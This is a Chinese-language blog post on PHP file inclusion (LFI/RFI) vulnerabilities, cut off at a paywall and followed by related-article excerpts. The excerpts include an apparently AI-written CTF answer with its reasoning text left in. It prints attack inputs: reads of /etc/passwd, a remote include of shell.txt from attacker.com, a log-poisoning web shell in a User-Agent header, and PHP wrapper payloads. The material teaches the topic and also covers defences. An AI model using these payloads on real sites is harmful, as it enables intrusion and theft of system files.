攻防_漏洞_文件包含_文件包含漏洞详解

已于 2024-02-04 14:38:11 修改
阅读量4.2k 收藏 19
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 攻防 文章标签: 安全 web安全
于 2022-10-22 02:44:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/redglare/article/details/127456686

1、文件包含概念
程序开发人员会把重复使用的函数、变量、类等数据写到单个文件中,需要使用到里面的数据时直接调用此文件,而无需再次编写,这种文件调用的过程称为文件包含。

2、文件包含相关函数
require( )//找不到被包含文件时产生错误,停止脚本运行include( )//找不到被包含文件时产生警告,脚本继续运行
include_once() //与include类似,唯一区别就是文件已经被包含则不再包含
require_once() //与require类似,唯一区别就是文件已经被包含则不再包含

3、文件包含漏洞介绍
程序开发人员希望代码更灵活,所以将被包含文件设置成变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。
根据包含文件的不同,我们将文件包含漏洞划分为两类:1.本地文件包含LFI (Local File lnclude)
⒉远程文件包含RFL (Remote File Include)

4、文件包含漏洞危害:
1、如果网站支持上传,上传任意后缀文件,被包含的文件中含有PHP代码,则可以造成命令执行。
2、直接包含系统内其他文件,因为文件包含本质就是将包含文件内容用php执行一遍,所以不是有效代码的部分就会直接输入,这样我们便可以得到系统中的文件。
例:?file=/etc/passwd
3、除了使用路径的方式,文件包含也支持使用协议,我们可以使用file://协议读取文件。
例:?file=file:/ll/etc/passwd

5、PHP伪协议利⽤:
5.1、php://input:
php://input可以获取POST的数据流,当它与包含函数结合时,php://input流会被当作php⽂件执
⾏,从⽽导致任意代码执⾏。
利⽤条件
allow_url_include=On
allow_url_fopen=Off/On
5.2、php://filt

最低0.47元/天 解锁文章

200万优质内容无限畅学
ctf从入门到放弃:文件包含漏洞190522
爱党人士
05-22 865
文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简洁,会使用“包含”函数功能。 比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上 一句<?php include fuction.php?>就可以调用函数代码。 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用 了“包含...
详解文件包含漏洞及其解决方法
2301_77004573的博客
04-29 2187
文件包含漏洞和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。注:(包含:程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写)例如我们在写c语言编程时的include就是个包含的应用。
ctf文件包含漏洞(一)
wlllllianqing的博客
10-06 2509
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数: include() include_once() require() require_once() (未完持续…) ...
CTF-文件包含漏洞
最新发布
2301_81208321的博客
07-23 770
放在PHP脚本的任意位置,当执行到include指定引入的文件时,才将它包含并尝试执行,第二次遇到还会重新解释一次。通过PHP函数引入文件时,传入的文件名没有经过合理的验证,实现操作预设之外的文件,导致意外的文件泄露/恶意代码注入。- 一般方在PHP脚本的最前面,PHP执行前就会先读入require指定引入的文件,尝试执行,不会重复解释。- 用于读取源码,当与包含函数结合时,php://filter流会被当做php文件执行,因此一般。,抓包,改成post方法,写入php代码。
文件包含漏洞 基础
weixin_50464560的博客
03-21 1464
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
文件包含漏洞及防御
慕舟舟的博客
03-23 2609
出现的问题:可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞;这就被称为文件包含漏洞文件包含漏洞是一种常见的Web应用程序漏洞,允许恶意用户通过在URL或表单字段中注入恶意代码来访问和执行服务器上的文件。这种漏洞通常出现在PHP等动态网页语言中,当应用程序使用用户提供的输入直接包含文件时容易发生。攻击者利用文件包含漏洞可以执行各种恶意操作,比如读取敏感文件、执行系统命令、获取数据库信息等。
CTF-hub文件包含漏洞
qq_50605865的博客
04-16 2415
第一个文件包含,先审计代码 ls查看一下 尝试找带有“flag”字样的文件,找到了 查看flag,得到flag php:input 还是先审计代码,在url栏发一个input用bp拦截 这里我们把GET类型改为POST类型 末行加入一行PHP 执行ls 找到flag文件后 cat /flag_xxxxx查看 得到flag 远程包含漏洞 审计代码,发一个input用bp拦截 还是改包,查找 找到flag文件,查看得到flag ...
Android安全攻防指南_漏洞利用缓解技术_编程案例解析实例详解课程教程.pdf
05-05
《Android安全攻防指南》深入探讨了Android系统中的漏洞利用缓解技术,这是攻防两端持续博弈的焦点。每当攻击手段曝光,防御措施就需要跟进,反之亦然。此书旨在介绍这些现代缓解技术,并分析其在Android环境中的...
Android安全攻防指南_用户态软件的漏洞利用_编程案例解析实例详解课程教程.pdf
05-05
《Android安全攻防指南》一书的第8章聚焦于Android系统用户态软件中的内存破坏漏洞利用,这是安全攻防领域的重要课题。本章主要针对ARM架构,详细讲解了栈溢出等常见漏洞类型,以及如何开发漏洞利用代码(exploit)...
Web后端服务平台解析漏洞与修复、文件包含漏洞详解
CoffeMilk的博客
09-19 1607
Web网站的运行一般需要后端的服务器平台提供服务解析服务,常见的服务器平台有Apache、Nginx、IIS,而同一服务器下不同版本的服务平台又有不同的解析漏洞文件包含操作,在目前流行的开发语言(Java、C#、python、php、...)中都会提供;但是PHP对于文件包含所提供的功能太强大,太灵活,故包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏洞只出现PHP语言之中,其实在其它语言中也可能出现包含漏洞
文件包含漏洞】——文件包含漏洞防御
weixin_45588247的博客
08-05 5221
文章目录一、实验目的:二、实验环境:三、防御说明:四、防御措施:1. 设置白名单:2. 过滤危险字符:3. 设置文件目录(配置php.ini):4. 关闭危险配置(配置php.ini):五、防御总结: 一、实验目的: 1、通过本次学习,掌握文件包含的过滤验证方式。 2、学习在修复文件包含漏洞的方法。 二、实验环境: 靶 机: windows10虚拟机:192.168.100.150       phpstudy2018_Apache集成环境 三、防御说明: 文件包含漏洞防御:
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 9万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含攻击
web13985085406的博客
05-16 646
文件包含:将本地可复用的文件利用包含函数在当前页面中执行。(将文件以脚本执行) 如果某个页码具有这种功能,并且在这个包含的过程中,被包含的函数名可通过参数的方式被用户端控制,那么就可能存在文件包含漏洞文件包含漏洞指当PHP函数引入文件时,没有合理校验传入的文件名,从而操作了预想之外的文件,导致以外的文件泄露甚至恶意的代码注入。 在PHP环境下,可利用include、require、include_once、require_once函数调用文件,实现文件包含的效果。 漏洞原理 其原理就职注入一段用户能控制
文件包含漏洞与防御
cxm4545的博客
04-27 1345
我这里直接引用Pikachu漏洞练习平台对于文件包含的概述,讲得很通俗易懂。文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。(可以大大减少重复的代码)大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞
ctf-web:文件包含漏洞和举例-HCTF2018 WarmUp
薯片薯条的博客
10-15 8万+
我又回来更新了,这次是关于web方面的文件包含漏洞.我会在后面以详细的角度来写清楚这个漏洞的利用方法. 当然,以下都是我自己的理解,表述什么的都有些野人化了.所以希望各位大佬手下留情. 一.漏洞产生的原因 这个漏洞可以追溯到很久.更准确来说,其实是人为产生的.由于我php学的不是很专业,所以我就拿c语言来举例了.php里面使用的是include命令,c语言使用的是#include预处理命令.作用是相似的. 我新建了两个文件,内容如图. wzc.h: #include "stdio.h" void pri.
网络安全-文件包含漏洞原理、攻击及防御
关注网络安全、云原生安全
08-14 7064
目录 简介 类型 原理 攻击 防御 简介 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 类型 根据不同的配置环境,文件包含漏洞分为如下两种情况:1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。2.远程文件
web安全文件包含渗透攻击
干铮的博客
05-02 6034
文件包含渗透攻击 严格来说,文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。“代码注入”的典型代表就是文件包含文件包含漏洞可能出现在JSP、PHP、ASP等语言中,原理都是一样的。 使用文件包含漏洞进行攻击需要满足两个条件 1:Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件; 2:用户能够控制该动态变量...
CTF文件包含漏洞总结
Lethe's Blog
02-13 5万+
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
文件包含漏洞习题攻防世界
04-03
<think>好的,我现在需要处理用户关于文件包含漏洞的查询,特别是与CTF比赛、攻防世界以及防御方法相关的内容。首先,我需要回忆文件包含漏洞的基础知识,包括它的类型(比如本地文件包含LFI和远程文件包含RFI)、常见触发场景,以及如何利用这些漏洞进行攻击。 接下来,用户提到了CTF习题和实战演练,所以我应该查找相关的CTF题目或平台,比如攻防世界(XCTF)、DVWA、sqli-labs等,是否有涉及文件包含的题目。例如,DVWA中的File Inclusion模块可能是一个常见的练习环境。同时,CTF比赛中可能通过包含特定文件获取flag,或者利用PHP的伪协议(如php://filter)来读取源代码。 然后,用户可能需要具体的漏洞利用步骤,比如如何通过参数传递恶意路径,或者利用日志文件注入代码。此外,防御方法也是关键,比如输入验证、禁用危险函数(allow_url_include)、设置白名单等。 需要注意的是,引用用户提供的参考资料中的内容,比如引用[5]提到的DVWA中的fi漏洞测试,以及引用[3]关于防御webshell的文件监控。同时,要确保回答结构清晰,分点列出漏洞原理、CTF例题、利用方式、防御措施,并生成相关问题。 最后,检查是否满足系统级指令:行内公式用$,独立公式用$$,正确的中文回答,生成相关问题,并正确添加引用标识。确保LaTeX语法正确,比如在提到数学表达式时正确使用$包裹。</think>### 文件包含漏洞详解 #### 一、漏洞原理 文件包含漏洞(File Inclusion)允许攻击者通过动态加载文件的功能(如PHP的`include`、`require`)注入恶意文件路径,分为两类: 1. **本地文件包含(LFI)**:包含服务器本地文件,例如: `http://example.com/index.php?page=../../etc/passwd` 2. **远程文件包含(RFI)**:包含远程服务器文件(需`allow_url_include=On`),例如: `http://example.com/index.php?page=http://attacker.com/shell.txt` #### 二、CTF例题与实战 1. **攻防世界(XCTF)例题** - 题目描述:通过文件包含读取`/flag`文件 - 解法:使用PHP伪协议`php://filter`读取源码 ```http http://target.com/?file=php://filter/convert.base64-encode/resource=flag.php ``` 解码Base64获取flag[^5][^1] 2. **DVWA实战(File Inclusion模块)** - 低安全级别下直接包含`file3.php`触发XSS漏洞[^5] - 高级别需绕过路径限制,例如: `http://192.168.20.48/DVWA/vulnerabilities/fi/?page=file:///var/log/apache2/access.log` #### 三、漏洞利用方式 1. **敏感文件读取** - Linux:`/etc/passwd`、`/proc/self/environ` - Windows:`C:\Windows\system.ini` 2. **日志文件注入** 修改User-Agent为PHP代码,包含日志文件执行命令: ```http GET /?page=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']);?> ``` 3. **PHP伪协议利用** - `php://input`:直接执行POST数据 - `data://text/plain,<?php phpinfo();?>` #### 四、防御方法 1. **输入验证** 使用白名单限制包含的文件名,例如: ```php $allowed = ['home.php', 'about.php']; if (in_array($_GET['page'], $allowed)) { include($_GET['page']); } ``` 2. **禁用危险配置** - 设置`allow_url_include=Off` - 关闭错误回显(`display_errors=Off`) 3. **文件监控** 对Web目录实时监控,异常修改立即恢复[^3]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

赤年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值